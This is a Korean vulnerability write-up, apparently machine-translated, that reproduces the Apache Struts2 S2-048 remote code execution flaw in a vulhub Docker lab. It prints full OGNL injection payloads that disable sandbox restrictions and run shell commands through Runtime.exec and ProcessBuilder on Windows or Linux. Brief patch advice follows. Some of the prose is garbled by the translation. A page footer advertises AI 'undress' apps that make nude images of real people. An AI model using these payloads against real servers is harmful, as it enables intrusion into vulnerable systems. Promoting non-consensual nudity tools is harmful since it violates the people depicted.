0x00소개
Struts2 프레임워크는 Java EE 웹 애플리케이션 개발을 위한 오픈 소스 웹 애플리케이션 아키텍처입니다. Java Servlet API를 활용 및 확장하고 개발자가 MVC 아키텍처를 채택하도록 권장합니다. Struts2는 WebWork의 뛰어난 디자인 아이디어를 핵심으로 삼고 Struts 프레임워크의 장점 중 일부를 흡수하며 MVC 디자인 패턴으로 구현된 더욱 깔끔한 웹 애플리케이션 프레임워크를 제공합니다.
0x01 취약점 개요
Apache Struts2 2.3.x 시리즈에는 struts2-struts1-plugin 플러그인이 활성화되어 있고 struts2-showcase 디렉토리가 존재하는 이유는 ActionMessage가 고객이 제어할 수 있는 매개변수 데이터를 수신할 때입니다. 후속 데이터 접합이 전달됨 부적절한 사후 처리로 인해 임의 코드 실행이 발생함
0x02 영향 범위
struts2-struts1-plugin 플러그인이 활성화된 Apache Struts 2.3.x 시리즈 버전.
0x03 환경 구축
1. Apache Struts2를 직접 구축하는 것은 더 복잡합니다. 이 취약성 환경은 vulhub의 docker 환경을 사용하여 구축됩니다.
다운로드 주소: https://github.com/vulhub/vulhub
2. 다운로드 후 압축을 풀고 s2-048 디렉터리에 들어가서 취약점 환경을 시작하세요
cd cd vulhub-master/struts2/s2-048/ //디렉터리 입력
docker-compose up -d //촬영 범위 시작
3. docker ps를 사용하여 시작 성공 여부를 확인하세요
4. ip:8080/hello 브라우저 .action에서 다음 페이지 환경이 설정되어 있는지 확인하세요
1 브라우저에 다음 링크를 입력하여 취약점 페이지에 접속하세요
http ://192.168.3.160:8080/integration/saveGangster.action
2. 첫 번째 양식 "Gangster Name"에 ${1+1}을 입력하고 아래에 원하는 내용을 입력한 후 실행된 OGNL을 보려면 제출을 클릭하세요. 표현식
2. Gangster Name"에서 ${1+1}을 다음 명령
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)으로 실행되는 페이로드 문으로 변경합니다.(# _memberAccess?(#_memberAccess=#dm):((# 컨테이너=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl. OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames() .clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@ org.apache.commons.io.IOUtils@toString(@ java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}
3 . Burp를 사용하여 패킷을 캡처하고 명령 실행을 위한 페이로드로 수정할 수도 있습니다. ?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil @class)).(#ognlUtil.getExcludedPackageNames().clear()).(# ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe ','/c',#cmd}:{'/bin/bash',' -c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p. RedirectErrorStream(true)).(#process=#p.start()).(# ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons. io.IOUtils@copy(#process.getInputStream(),#ros)).(# ros.flush())}
4. 자동화된 스크립트나 그래픽 도구를 사용하여 구현할 수 있으며 여기서는 설명하지 않습니다.
Tools는 GitHub에서 검색하고 다운로드할 수 있습니다
0x05 수리 제안
1. 업그레이드 최신 버전으로 업그레이드하는 것이 좋습니다
2. 비즈니스 상황에 따라 struts-2.3을 비활성화하고 닫습니다(삭제). .xappsstruts2-showcase.war 패키지
위 내용은 Apache Struts2-048 원격 코드 실행 취약점을 재현하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

AI Hentai Generator
AI Hentai를 무료로 생성하십시오.

인기 기사

뜨거운 도구

SecList
SecLists는 최고의 보안 테스터의 동반자입니다. 보안 평가 시 자주 사용되는 다양한 유형의 목록을 한 곳에 모아 놓은 것입니다. SecLists는 보안 테스터에게 필요할 수 있는 모든 목록을 편리하게 제공하여 보안 테스트를 더욱 효율적이고 생산적으로 만드는 데 도움이 됩니다. 목록 유형에는 사용자 이름, 비밀번호, URL, 퍼징 페이로드, 민감한 데이터 패턴, 웹 셸 등이 포함됩니다. 테스터는 이 저장소를 새로운 테스트 시스템으로 간단히 가져올 수 있으며 필요한 모든 유형의 목록에 액세스할 수 있습니다.

WebStorm Mac 버전
유용한 JavaScript 개발 도구

mPDF
mPDF는 UTF-8로 인코딩된 HTML에서 PDF 파일을 생성할 수 있는 PHP 라이브러리입니다. 원저자인 Ian Back은 자신의 웹 사이트에서 "즉시" PDF 파일을 출력하고 다양한 언어를 처리하기 위해 mPDF를 작성했습니다. HTML2FPDF와 같은 원본 스크립트보다 유니코드 글꼴을 사용할 때 속도가 느리고 더 큰 파일을 생성하지만 CSS 스타일 등을 지원하고 많은 개선 사항이 있습니다. RTL(아랍어, 히브리어), CJK(중국어, 일본어, 한국어)를 포함한 거의 모든 언어를 지원합니다. 중첩된 블록 수준 요소(예: P, DIV)를 지원합니다.

VSCode Windows 64비트 다운로드
Microsoft에서 출시한 강력한 무료 IDE 편집기

DVWA
DVWA(Damn Vulnerable Web App)는 매우 취약한 PHP/MySQL 웹 애플리케이션입니다. 주요 목표는 보안 전문가가 법적 환경에서 자신의 기술과 도구를 테스트하고, 웹 개발자가 웹 응용 프로그램 보안 프로세스를 더 잘 이해할 수 있도록 돕고, 교사/학생이 교실 환경 웹 응용 프로그램에서 가르치고 배울 수 있도록 돕는 것입니다. 보안. DVWA의 목표는 다양한 난이도의 간단하고 간단한 인터페이스를 통해 가장 일반적인 웹 취약점 중 일부를 연습하는 것입니다. 이 소프트웨어는
